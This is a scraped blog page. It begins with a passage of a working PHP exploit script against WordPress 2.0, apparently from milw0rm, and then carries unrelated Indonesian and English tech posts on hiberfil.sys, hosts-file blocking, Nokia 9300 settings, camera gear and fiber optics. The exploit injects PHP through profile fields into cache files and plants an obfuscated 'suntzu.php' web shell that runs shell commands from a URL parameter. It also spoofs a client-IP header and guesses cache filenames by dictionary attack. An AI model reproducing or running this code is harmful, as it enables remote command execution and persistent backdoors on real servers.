//O:8:"stdClass":23:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:18:"suntzoi@suntzu.org";s:8:"user_url";s:0:"";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:6:"suntzu";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:8:"nickname";s:6:"suntzu";s:11:"description";s:0:"";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:14:"user_firstname";s:0:"";s:13:"user_lastname";s:0:"";s:16:"user_description";s:0:"";}
?>

but...what happens if you inject a carriage return ( chr(13)...), some php code and some escape chars when you update your profile (ex. in "displayname" argument)?

Look at this file now:

<?php
//O:8:"stdClass":24:{s:2:"ID";s:3:"106";s:10:"user_login";s:6:"suntzu";s:9:"user_pass";s:32:"a2b0f31cd94e749b58307775462e2e4b";s:13:"user_nicename";s:6:"suntzu";s:10:"user_email";s:17:"suntzu@suntzu.org";s:8:"user_url";s:7:"http://";s:15:"user_registered";s:19:"2006-05-24 23:00:42";s:19:"user_activation_key";s:0:"";s:11:"user_status";s:1:"0";s:12:"display_name";s:185:"suntzu
error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo 56789;passthru($_REQUEST[cmd]);echo 56789;//suntzuuuuuuuuuuuuuu";s:10:"first_name";s:6:"suntzu";s:9:"last_name";s:6:"suntzu";s:8:"nickname";s:6:"suntzu";s:11:"description";s:6:"whoami";s:6:"jabber";s:0:"";s:3:"aim";s:0:"";s:3:"yim";s:0:"";s:15:"wp_capabilities";a:1:{s:10:"subscriber";b:1;}s:13:"wp_user_level";s:1:"0";s:10:"user_level";s:1:"0";s:12:"rich_editing";s:4:"true";s:14:"user_firstname";s:6:"suntzu";s:13:"user_lastname";s:6:"suntzu";s:16:"user_description";s:6:"whoami";}
?>

you have a backdoor on target server...

Now you have to search a way to guess filenames 'cause we have an index.php to trivially protect folders, but... guess what? give a look at wp-includes/cache.php at line 355:

...
$cache_file = $group_dir.md5($id.DB_PASSWORD).'.php';
...

$group_dir is the folder where files are stored DB_PASSWORD costant could be empty, if so... you have only to calculate the md5 hash of your user id, then:

http://[target]/[path]/wp-content/cache/users/[md5(user_id)].php?cmd=ls%20-la

the same with userlogins/ folder, this time:

http://[target]/[path]/wp-content/cache/userlogins/[md5(username)].php?cmd=ls%20-la

otherwise you can check if DB_PASSWORD is in a dictionary through the -D option, this tool calculate the hash to do something like this:

http://[target]/[path]/wp-content/cache/users/[md5([user_id][db_pass])].php?cmd=ls%20-la
http://[target]/[path]/wp-content/cache/userloginss/[md5([username][db_pass])].php?cmd=ls%20-la

II) an ip-spoofing issue in vars.php:

...
// On OS X Server, $_SERVER['REMOTE_ADDR'] is the server's address. Workaround this
// by using $_SERVER['HTTP_PC_REMOTE_ADDR'], which *is* the remote address.
if ( isset($_SERVER['HTTP_PC_REMOTE_ADDR']) )
$_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_PC_REMOTE_ADDR'];
...

poc:
you can set an http header like this when you register:

PC_REMOTE_ADDR: 1.1.1.1
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;

}
$host=$argv[1];
$path=$argv[2];
$username=$argv[3];
$password=$argv[4];
$cmd="";
$port=80;
$proxy="";
$dict="";

for ($i=5; $i<=$argc-1; $i++){
$t=$argv[$i][0].$argv[$i][1];
if (($t<>"-p") and ($t<>"-P") and ($t<>"-D"))
{$cmd.=" ".$argv[$i];}
if ($t=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($t=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($t=="-D")
{
$dict=str_replace("-D","",$argv[$i]);
}
}
$cmd=urlencode($cmd);
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "step 0 -> check if suntzu.php is already installed...\r\n";
$check=array("users/suntzu.php",
"userlogins/suntzu.php"
);
for ($i=0; $i<=count($check)-1; $i++)
{
$packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"*DL*"))
{
echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo $temp[1]."\r\n";echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la";die;
}
}
echo "step 1 -> Login ...\r\n";
$data="log=".urlencode(trim($username));
$data.="&pwd=".urlencode(trim($password));
$data.="&rememberme=forever";
$data.="&submit=".urlencode("Login »");
$data.="&redirect_to=wp-admin";
$packet="POST ".$p."wp-login.php HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n"; //ip spoofing bug in vars.php ;)...
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$cookie=$temp2[0];
$temp2=explode(" ",$temp[2]);
$cookie.=" ".$temp2[0];
if ($cookie==''){echo "Unable to login...";die;}
else {echo "cookie ->".$cookie."\r\n";}

echo "step 2 -> Retrieve your user id...\r\n";
$packet="GET ".$p."wp-admin/profile.php HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("checkuser_id\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$user_id=$temp2[0];
if ($user_id==''){die("Unable to retrieve user id...\r\n");}
else {echo "user id -> ".$user_id."\r\n";}

echo "step 3 -> Update your profile with the evil code...\r\n";
$suntzu='$fp=fopen("suntzu.php","w");fputs($fp,chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(114).chr(114).chr(111).chr(114).chr(95).chr(114).chr(101).chr(112).chr(111).chr(114).chr(116).chr(105).chr(110).chr(103).chr(40).chr(48).chr(41).chr(59).chr(115).chr(101).chr(116).chr(95).chr(116).chr(105).chr(109).chr(101).chr(95).chr(108).chr(105).chr(109).chr(105).chr(116).chr(40).chr(48).chr(41).chr(59).chr(105).chr(102).chr(32).chr(40).chr(103).chr(101).chr(116).chr(95).chr(109).chr(97).chr(103).chr(105).chr(99).chr(95).chr(113).chr(117).chr(111).chr(116).chr(101).chr(115).chr(95).chr(103).chr(112).chr(99).chr(40).chr(41).chr(41).chr(123).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(61).chr(115).chr(116).chr(114).chr(105).chr(112).chr(115).chr(108).chr(97).chr(115).chr(104).chr(101).chr(115).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(125).chr(101).chr(99).chr(104).chr(111).chr(32).chr(34).chr(42).chr(68).chr(76).chr(42).chr(34).chr(59).chr(112).chr(97).chr(115).chr(115).chr(116).chr(104).chr(114).chr(117).chr(40).chr(36).chr(95).chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(59).chr(63).chr(62));fclose($fp);//';
$suntzu=urlencode($suntzu);
$code='error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()){$_REQUEST[cmd]=stripslashes($_REQUEST[cmd]);}echo chr(42).chr(68).chr(76).chr(42);passthru($_REQUEST[cmd]);echo chr(42).chr(68).chr(76).chr(42);';
$code=urlencode($code);
$data="from=profile";
$data.="&checkuser_id=".$user_id;
$data.="&user_login=".urlencode(trim($username));
$data.="&first_name=".urlencode(trim($username));
$data.="&last_name=".urlencode(trim($username)).chr(13).$suntzu."//suntzuuu";
$data.="&nickname=".urlencode(trim($username));
$data.="&display_name=".urlencode(trim($username)).chr(13).$code."//suntzuu";
$data.="&email=".urlencode("suntzu@suntzu.org");
$data.="&url=".urlencode("http://");
$data.="&aim=";
$data.="&yim=";
$data.="&jabber=";
$data.="&description=whoami";
$data.="&rich_editing=true";
$data.="&submit=".urlencode("Update Profile »");
$packet="POST ".$p."wp-admin/profile-update.php HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Referer: http://".$host.$path."wp-admin/profile-update.php\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("updated=true",$html)){echo "Done...\r\n";}
else {die("Unable to update profile...");}

echo "step 4 -> go to profile page to avoid cached files deletion...\r\n";
$packet="GET ".$p."wp-admin/profile.php?updated=true HTTP/1.0\r\n";
$packet.="PC_REMOTE_ADDR: 1.1.1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacketii($packet);
if (eregi("200 OK",$html)){echo "Done...\r\n";}
sleep(2);

echo "step 5 -> check for an empty db password...\r\n";
$check=array("users/".md5($user_id).".php",
"userlogins/".md5(trim($username)).".php"
);
for ($i=0; $i<=count($check)-1; $i++)
{
$packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacketii($packet);
if (eregi("*DL*",$html))
{
echo "Exploit succeeded...\r\n";$temp=explode("*DL*",$html);echo($temp[1]);echo"\r\nNow you can launch commands through the followig urls:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";die;
}
}

if ($dict=='') {echo "exploit failed...\r\n";}
else
{
echo "step 6 -> trying with dictionary attack...\r\n";
if (file_exists($dict))
{
$fp=fopen($dict,"r");
while (!feof($fp))
{
$word=trim(fgets($fp));
$check=array("users/".md5($user_id.$word).".php",
"userlogins/".md5(trim($username).$word).".php"
);
for ($i=0; $i<=count($check)-1; $i++)
{
echo "Trying with ".$check[$i]."\r\n";
$packet="GET ".$p."wp-content/cache/".$check[$i]." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: close\r\n\r\n";
sendpacketii($packet);
if (strstr($html,"*DL*"))
{
echo "Exploit succeeded...\r\n";fclose($fp);$temp=explode("*DL*",$html);echo $temp[1];echo"Now you can launch commands through the followig url:\r\n http://".$host.$path."wp-content/cache/".$check[$i]."?cmd=ls%20-la\r\nalso, you should have a backdoor called suntzu.php in the same folder\r\n";
die;
}
}
}
fclose($fp);
//if you are here...
echo "Exploit failed...\r\n";
}
else
{
die($dict."does not exist!");
}
}
?>

# milw0rm.com [2006-05-25]

Function Of hiberfil.sys File And How To Remove It

2006-05-27T16:37:00.000+07:00

It happens to most users of Windows XP. One day you are searching for a file or cleaning up the PC's hard drive and you encounter a huge file - hiberfil.sys. Normally located at C:\hiberfil.sys, its size can vary from 250MB to over 1GB. You try to delete the file - it's not a good idea to delete files you don't understand - but Windows won't oblige anyway.

But, if you can't see this file, it doesn't mean that you didn't activated hibernation functon. First, make sure that you have unchecked "Hide Protected Operation System Files (Recommended)" option. Here's how to do it:

- Open Windows Explorer
- Click at Tools menu, and after that click Folder Options sub menu
- Click at View Tabs
- Unchecked "Hide Protected Operation System Files (Recommended)" option
- Click Apply Button and Click Apply To All Folders button

Windows XP has a feature that is called Windows hibernation. Instead of shutting down and restarting your computer, Windows takes a snapshot of everything running on your system, copies it to the hard drive and then turns off most of your hardware. In theory, it is supposed to be a quick shortcut or power saving option that allows you to leave your PC in suspended animation until you are ready to work again. Hibernation temporarily 'freezes' the computer when the PC becomes inactive, so it won't work if you have tasks running constantly (eg downloading files). However it can be handy if you want the computer to sleep after a task has completed (such as creating a video).

To wake up from hibernation you normally move the mouse or hit the spacebar on the keyboard. When you boot up from hibernation mode, the Operating System can read this file and get running a lot faster as apposed to a cold boot when it has to look around for installed hardware, installing drivers and so-on and so-on. Nothing is lost during a power service outage when hibernating. Therefore, great for laptops that get plugged in-and-out all the time. Suspend mode has no such file, everything stays in RAM which depends on power. Not so great for laptops running on low batteries.

Hibernation takes everything in memory and writes it to your hard drive as the hiberfil.sys file. If you have 512MB of memory, then hiberfil.sys will be about 512MB. If you have 1GB, then the file will be around 1GB. So, it's the same size as your RAM Memory Size. The important point to remember is that even if you don't use hibernation, hiberfil.sys will still take up this huge amount of disk space.

But, the presence of the Hiberfil.sys file will prevent Disk Defragmenter from performing a thorough defragmenting operation.

The way to remove the file is to turn off the hibernation feature (by default, hibernate is activated automatically when XP is installed). Here's how to do it:

- Open the Windows Control Panel
- Double-click Power Options
- Click the Hibernate tab, de-select the 'Enable hibernate support' check box, and then click Apply.
- Restart your computer and hiberfil.sys will be automatically deleted.

If you change your mind in the future and would like to use hibernation, go to the Windows Help and Support Center and search for 'enable hibernation'.

The Easy Way To Search Music at Google

2006-05-01T19:10:00.000+07:00

You can search your favorite music at google, by copy and paste the codes below into the address bar in any browser:

javascript:void(qr=prompt('Slapman%20-%20Music%20Search%20Indexer%20-%20Type%20any%20Music%20or%20Album%20Name:%20',''));if(qr)location.href='http://www3.google.com/search?&num=100&hl=en&ie=UTF-8&oe=UTF-8&btnG=Google+Search&as_epq=parent+directory=&as_oq=mp3+wma+ogg+anonymous&as_eq=module+modules&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images&as_q='+escape(qr);void%201;

or you can use this form:
Click Here

Tips Untuk Memblok Situs Secara Manual

2006-03-22T20:22:00.000+07:00

Apabila Anda menggunakan sistem operasi Windows dan tidak menggunakan proxy dalam berinteraksi dengan dunia maya, carilah file 'hosts' atau apabila Anda menggunakan Windows XP dan menggunakan prosedur instalasi standart, Anda dapat menemukannya di C:\WINDOWS\system32\drivers\etc\hosts

File tersebut dapat digunakan untuk (mapping) alamat URL situs ke IP lokal.

Selain dapat digunakan untuk memblok situs-situs yang tidak dikehendaki, tips ini juga dapat dipakai untuk memblok situs-situs iklan agar akses internet dapat lebih cepat.

Jadi apabila Anda ingin memblok situs library.monx007.com, cukup tambahkan baris seperti dibawah ini di file hosts tersebut:

127.0.0.1 library.monx007.com

Contoh Lain:

127.0.0.1 us.a1.yimg.com

127.0.0.1 www.doubleclick.net

127.0.0.1 playboy.com

127.0.0.1 www.playboy.com

127.0.0.1 ad.detik.com

Setting Internet Nokia 9300

2006-03-21T17:30:00.000+07:00

Nokia 9300 rnempunyai dimensi yang lebih mungil dari seri di atasnya yakni Nokia 9500, tetapi kemampuannya tidak jauh berbeda. Dengan Nokia 9300, Anda akan mendapatkan fitur-fitur yang mendukung Multiple Accounts, Bluetooth, dengan Operating System Symbian 7.0s. Untuk keperluan aktivitas kantor, tersedia aplikasi Documents, Spreadsheets, dan Presentations. Nokia 9300 juga men-support IMAP4, POP3, SMTP dan lainnya. Bagi Anda yang berminat atau bahkan sudah menjadi pengguna tipe ini, berikut kami sajikan setting koneksi Internetnya, agar Anda tetap bisa tersambung ke Internet via telepon seluler Anda.

Setting Koneksi Pada Nokia 9300

Dari Windows, pilih ''Tools" > "Control Panel" > "Connections" > "Internet Setup".

1. Pilih menu "New" kernudian akan muncul pertanyaan "Do you want to create a copy of existing Internet access point?", pilih "No"

2. Lalu akan muncul "Internet Setup Window", tekan "Next"

3. Ketik seperti dibawah ini:
Internet Setting Name: CBN
Network ID: Internet
Internet Setting Type: GSM data

4. Tekan "Next"

5. Ketik seperti di bawah ini:
Telephone number: 02157989000
Prompt password: Ketik "YES" jika Anda ingin menyimpan password tersebut atau ketik "NO" jika tidak.
• Pada menu "Username", masukkan username Anda.
• Pada menu "Password", masukkan login password Anda

6. Pilih menu "Advanced" > "IP Configurations":
• Auto retrieve IP: Yes
• Auto Retrieve DNS: No
• Primary DNS: 202.158.3.7
• Secondary DNS: 202.158.3.6

7. Pilih "Proxies"
• Proxy protocol: HTTP.
• Use proxy server: Yes
• Proxy server: proxy.cbn.net.id
• Port number: 8080

8. Tekan "Done" > "Finish".

9. Tekan tombol "Web Application" pada keyboard Communicator, lalu pilih "Open web address".

10. Masukkan URL situs (web site address) yang akan Anda kunjungi misalnya (http://www.cbn.net.id), lalu tekan "GoTo".
Window Network Connection akan muncul.

11. Pada "Select an access point", pilih "CBN" kemudian tekan "Connect".

12. Jika username dan password Anda diterima, rnaka situs yang Anda kunjungi akan rnuncul.

13. Untuk disconnect, Anda dapat rnenekan tombol "Exit", atau dari window utarna Nokia 9300, pilih "Tools" > "Conn. Manager" - lalu pilih connection name dan tekan "Disconnect".

Setting E-mail Pada Nokla 9300

1. Pada window utama, pilih "Tools" > "Control Panel > "Messaging" > "Text Message" > "Create New" > "E-mail".

2. Pada General tab, ketik seperti di bawah ini:
• E-mail acount name: CBN eMail
• My name: Nama Anda
• Username: Alamat e-mail Anda
• Password: Password e-mail Anda
• My e-mail address: Alamat e-mail Anda
• Internet access: Pilih koneksi Inrernet Anda (CBN)

3. Pada Servers tab, ketik seperti di bawah ini:
• E-mail account type: POP3
• Outgoing Mail: smtp.cbn.net.id
• Incoming Mail: pop.cbn.net.id
• Use Authentication: No

4. Tekan "Done" > "Exit" sampai Anda keluar dan kembali pada mail window.

5. Untuk rnengirim e-mail, silahkan ikuti instruksi di bawah ini:

6. Tekan menu aphkasi "Messaging" pada keyboard Communicator.

7. Pilih "VVrite message" >"'E-mail".

8. Ketikkan alamat e-mail penerima pada "To", dan ketikkan pesan Anda pada body messagenya, seperti rnenulis e-mail biasa, lalu tekan "Send".

9. Untuk men-download e-mail Anda, silakan ikuti instruksi di bawah ini

10.Tekan menu aplikasi Messaging pada keyboard Communicator.

11. Lalu Tekan "retrieve e-mail".

Demikianlah setting-an koneksi untuk Nokia 9300, selamat mencoba!

Memory Stick Baru 4GB & 8GB SONY MEMORY STICK PRO DUO

2006-03-20T15:15:00.000+07:00

Pada CES 2006 lalu ini Sony juga mengumumkan bahwa jajaran Memory Stick Duo mereka akan bertambah dengan kapasitas 4 dan 8 GB di tahun 2006 ini. Hal ini tentunya akan menarik para pemilik Sony PSP, tapi mungkin kurang menarik bagi pemilik kamera digital Sony yang kebanyakan menganggap kapasitas 1 GB sudah lebih dari cukup.

Info: www.sony.com

Lensa 17-70mm Untuk Digital SLR

2006-03-19T21:21:00.000+07:00

SIGMA 17-70MM LENS: Lensa Zoom Standard dengan aperture besar yang didesain khusus untuk kamera digital SLR

Sigma Corporation mengumumkan peluncuran lensa 17-70mm F2.8 - 4.5 DC MACRO. Lensa ini sangat ideal untuk mengambil berbagai macam subjek dan di design khusus untuk kamera SLR digital yang mempunyai fitur APS-C size image sensor.

Lensa ini memiliki jarak fokus minimum 20cm (7.9"). Pendekatan maksimumnya sebesar 1:2.3 yang memungkinkan Anda untuk mengambil gambar close up secara detail. Sangat luar biasa untuk ukuran lensa zoom yang standard. Design lensa baru ini dan lapisan layer pada lensa ini akan mengurangi flare dan ghosting yang kerap terjadi pada kamera digital. Lensa Special Low Dispersion (SLD) dan dua elemen lensa aspherical akan memberikan correction yang sempurna untuk semua jenis tipe dan aberration untuk menghasilkan performa optical yang optimal unfuk semua jarak zoom.

Lensa ini memiliki aperture F2.8 sebesar 17mm wide angle, tapi masih terlihat ringkas dengan ukuran panjang total hanya 79mm (31") dan diameter 82.5mm (3.2"). Performa-nya sangat luar biasa, bahkan pada kondisi kurang cahaya di dalam ruangan maupun ketika senja.

Design lensa ini menggunakan sistem inner focusing, yang akan memastikan kecepatan AF yang tinggi dan akan mencegah bagian depan lensa untuk berputar.

Lensa ini juga dilengkapi dengan zoom lock, yang akan menghilangkan efek zoom creep ketika sedang bergerak.

Mengenal Fiber Optic

2006-03-17T14:01:00.000+07:00

Fiber optic adalah suatu materi,filament, ataupun bahan yang terbuat dari glass atau serat kaca vang berdiameter lebih kurang 120 micrometer (hampir sama dengan sehelai rambut manusia). la digunakan untuk mengantarkan jauh lebih banyak sinyal dalam bentuk pulsa cahaya (bisa berupa komunikasi suara maupun data) hingga mencapai lebih dari 50 kilometer tanpa memerlukan lagi bantuan perangkat repeater (penguat sinyal).

Teknologi serupa yang juga umum digunakan adalah dengan menggunakan materi tembaga (cooper) yang dapat mengantarkan transmisi sinyal berupa pulsa elektronik. Namun ini sangat terbatas dalam jumlah, kualitas serta jarak tempuhnya. Dengan demikian, jika dibandingkan dengan kabel coaxial maupun kabel tembaga, fiber optic lebih banyak digunakan dalam saluran backbone.

Sistem yang digunakan dalam fiber optic hampir sama dengan yang digunakan dalam sistem tembaga. Perbedaanya adalah dalam penggunaan pulsa cahaya untuk mengantarkan informasi data (teknologi tembaga menggunakan pulsa elektronik). Dalam sistem fiber optic, dikenal istilah transmitter, yaitu perangkat yang menjadi tempat awal penerimaan informasi data yang dikirimkan ke fiber optic. Informasi data berupa pulsa elektronik yang telah diterima oleh transmitter ini, kemudian diproses dan diterjemahkan menjadi informasi yang sama, tapi dalam bentuk pulsa cahaya. Transmitter biasanya menggunakan Light Emitting Diode (LED) atau Injection Laser Diode (ILD) dalam proses penerjemahan ini.

Ada tiga jenis kabel fiber optic yang biasanya digunakan, yaitu: single mode, multimode, dan plastic optical fiber, yang berfungsi sebagai penunjuk cahaya dari ujung kabel ke ujung kabel lainnya. Kemudian, dari transmitter berlanjut ke receiver, yang berfungsi untuk mengubah pulsa elektronik ke cahaya dan sebaliknya, dalam bentuk light-emitting diode ataupun laser.

Kabel fiber optic single mode merupakan fiber glass tunggal dengan diameter 8.3 sampai 10 mikrometer, memiliki satu jenis transmisi yang dapat mengantarkan data berkapasitas besar dengan kecepatan tinggi untuk jarak jauh, dan membutuhkan sumber cahaya dengan lebar spektrum yang lebih kecil. Kemampuan kabel jenis single mode dalam mengantarkan transmisi adalah 50 kali lebih cepat dari kabel jenis multimode, karena memiliki core yang lebih kecil sehingga dapat menghilangkan setiap distorsi dan pulsa cahaya yang tumpang tindih.

Kabel fiber optic multimode terbuat dari fiber glass dengan diameter lebih besar, yaitu 50 sampai dengan 100 mikrometer yang dapat mengantarkan data berkapasitas besar dengan kecepatan tinggi untuk jarak menengah. Apabila jarak yang ditempuh lebih dari 3000 kaki, akan terjadi distorsi sinyal pada sisi penerima yang mengakibatkan transmisi data menjadi tidak akurat.

Sedang plastic optical fiber adalah kabel berbasis plastik terbaru yang menjamin tingkat performa yang sama dengan fiber glass dalam jarak pendek dengan biaya yang jauh lebih murah.

Keuntungan dari fiber optic antara lain adalah kemampuannya yang baik dalam mengantarkan data dengan kapasitas yang lebih besar dalam jarak transmisi yang cukup jauh, kecepatan transmisi yang tinggi hingga mencapai ukuran gigabits, serta tingkat kemungkinan hilangnya data yang sangat rendah. Selain itu, tingkat keamanan fiber optic yang tinggi, aman dari pengaruh interferensi sinyal radio, motor, maupun kabel-kabel yang berada di sekitarnya, membuat fiber optic lebih banyak digunakan dalam infrastruktur perbankan atau perusahaan yang membutuhkan jaringan dengan tingkat keamanan yang tinggi. Kelebihan lainnya, fiber optic aman digunakan dalam lingkungan yang mudah terbakar dan panas. Dalam hal ukuran, fiber optic juga jauh lebih kecil dibandingkan dengan kabel tembaga, sehingga lebih menghemat tempat dalam ruangan network data center di mana pun.

Kekurangan fiber optic adalah harganya yang cukup mahal jika dibandingkan dengan teknologi kabel tembaga. Hal ini dikarenakan fiber optic dapat mengantarkan data dengan kapasitas yang lebih besar dan jarak transmisi yang lebih jauh jika dibandingkan tembaga yang masih memerlukan investasi tambahan berupa perangkat penguat (repeaters). Kekurangan lainnya adalah cukup besarnya investasi yang diperlukan untuk pengadaan sumber daya manusia yang andal, karena tingkat kesulitan implementasi dan deployment fiber optic yang cukup tinggi.

Saat ini, fiber optic telah digunakan sebagai standar kabel data dalam bidang physical layer telekomunikasi atau jaringan, seperti perangkat TV kabel, juga sistem keamanan yang menggunakan Closed Circuit Television (CCTV), dan lain sebagainya.